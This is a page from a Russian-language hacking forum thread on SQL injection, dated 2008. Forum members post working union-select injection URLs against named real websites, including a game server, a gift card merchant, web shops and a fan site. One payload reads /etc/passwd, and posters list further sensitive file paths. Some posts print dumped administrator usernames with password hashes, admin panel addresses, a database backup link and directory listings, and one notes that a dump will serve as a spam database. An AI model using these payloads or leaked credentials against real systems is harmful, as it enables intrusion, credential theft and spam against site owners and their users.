HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 682 из 1604 « Первая < 182582632672 678 679 680 681 682 683 684 685 686 6927327821182 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6811  
Старый 09.11.2008, 18:40
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию
Цитата:
Сообщение от Zinus  
http://lib.rin.ru/cgi-bin/new.pl?art=-1'+union+select+null,LOAD_FILE('/etc/passwd'),null/*
Zinus
Вот ещё несколько

/etc/my.cnf
/etc/apache/conf/httpd.conf
/etc/group
/etc/logrotate.d/vsftpd.log
 
Ответить с цитированием

  #6812  
Старый 09.11.2008, 21:38
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Вот скуля от меня:
Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58),%20locale,char(58)),5,6+from+account--
P.S:там кста не плохая спам база будет)
---------------------------------
И вот еше одна:
Код:
http://www.cdirani.com/zcat.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,user,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*
Админка:
Код:
http://www.cdirani.com/admin/login.php
Логин/пасс/ид:
Код:
admin:alisobhani:1
Вродь расшифровал,но они почему то не подходят(((

Тут канешно нету спам базы но все же...
Последний раз редактировалось -m0rgan-; 09.11.2008 в 22:28..
 
Ответить с цитированием

Gift card merchant
  #6813  
Старый 09.11.2008, 22:57
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию Gift card merchant
Цитата:
http://www.theucard.com/merchant-details.php?id=-564+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, version(),16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68--
5.0.51a-community

Бд,таблицы,колонки:

Код:
Дампите сами, пятая ж версия (очень много таблиц, сюда не влезут) :)


Проверяем юзеров на админа:
Цитата:
http://www.theucard.com/merchant-details.php?id=-564+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, group_concat(id,0x3a,username,0x3a,password,0x3a,a dmin,0x3a,email),16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68+from+acl--

Все xD
http://www.theucard.com/master/db_backup.sql -
21метр.
Полезно, если надо будет получить таблицы\поля xcart (как памятка)).Можно посписывать (=

dir'Ы:

Код:
http://www.theucard.com/test/
http://www.theucard.com/master/
http://www.theucard.com/_borders
http://www.theucard.com/_vti_bin
http://www.theucard.com/banners
http://www.theucard.com/cpanel
http://www.theucard.com/documents
http://www.theucard.com/downloads
http://www.theucard.com/files
http://www.theucard.com/gallery
http://www.theucard.com/images
http://www.theucard.com/master
http://www.theucard.com/mobile
http://www.theucard.com/my
http://www.theucard.com/register
http://www.theucard.com/terminal
http://www.theucard.com/test
http://www.theucard.com/webmail
http://www.theucard.com/y
Последний раз редактировалось ThreeD; 09.11.2008 в 23:00..
 
Ответить с цитированием

  #6814  
Старый 09.11.2008, 23:14
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию
http://www.lgtmerchant.com/shop/checkout.php?id=1+AND+substring(version(),1,1)=4/*&goods=6

Шоп.Четвёрочка. Принтабельных нет.
 
Ответить с цитированием

http://koleso.topof.ru
  #6815  
Старый 09.11.2008, 23:46
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию http://koleso.topof.ru
Код:
http://koleso.topof.ru/testing_info.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,admin_login,admin_password),6,7,8+from+admins
news:044e7b0ce67db55376abda253f52e101:1b
tyre:c1d42f7311bfb28391292190c0a7a904:30
disk:10f43033d0b00ecccfc676bb6baa3f8e:64
auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:046a47fda9108dcc3cbd9d9ac0080ab6:84
hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
Админка:
Код:
http://koleso.topof.ru/admin/login.php
 
Ответить с цитированием

  #6816  
Старый 10.11.2008, 01:25
MaDfUn
Познающий
Регистрация: 02.02.2007
Сообщений: 78
Провел на форуме:
1514596

Репутация: 49
По умолчанию
http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES _DECRYPT(AES_ENCRYPT(user,0x71),0x71)),3,4,5+FROM+ mysql.user/*
http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES _DECRYPT(AES_ENCRYPT(password,0x71),0x71)),3,4,5+F ROM+mysql.user/*


sqlinjfldodno-kashniki:sqlinjfld65204190655dbf01
 
Ответить с цитированием

МЭШ — американский сериал
  #6817  
Старый 10.11.2008, 01:48
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию МЭШ — американский сериал
Код:
http://www.4077th.ru/page.php?id=1453+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Вывод через ошибку:
Цитата:
Database error: Invalid SQL: SELECT t.Txt,t.Location FROM SiteTexts AS t,Pages AS p WHERE (p.Path='5.0.67-log' OR p.Alias='5.0.67-log') AND t.Pid=p.Pid AND t.Type=1 AND t.ShowAll AND p.Pid=1453 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- AND FIND_IN_SET('0',t.Event)
От CMS с таблицы Users:
Цитата:
admin:$1$2$9pq26SwhZqNsS.fGgK2.01
С таблицы administrators:
Цитата:
SSASSASSA:a02c6e505941da1f811397735c2407f2:0a
От форума:
Цитата:
CCA:d88e256d7ba95c8e93ba258eba0a9db9
Последний раз редактировалось FNS; 10.11.2008 в 02:21..
 
Ответить с цитированием

  #6818  
Старый 10.11.2008, 03:24
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию
В продолжение темы

Цитата:
http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,version(),3,4,5,6,7/*
5.0.45-community
 
Ответить с цитированием

  #6819  
Старый 10.11.2008, 03:44
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию
Цитата:
Сообщение от ThreeD  
В продолжение темы



5.0.45-community

http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,concat_ws(0x03a,user,password), 3,4,5,6,7+from+mysql.user/*
 
Ответить с цитированием

  #6820  
Старый 10.11.2008, 04:57
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
http://realestates-bg.eu/sgrada.php?page=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,us er,pass),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,3,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58+from+admin+limit+0,1

http://realestates-bg.eu/admin
 
Ответить с цитированием
Ответ
Страница 682 из 1604 « Первая < 182582632672 678 679 680 681 682 683 684 685 686 6927327821182 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ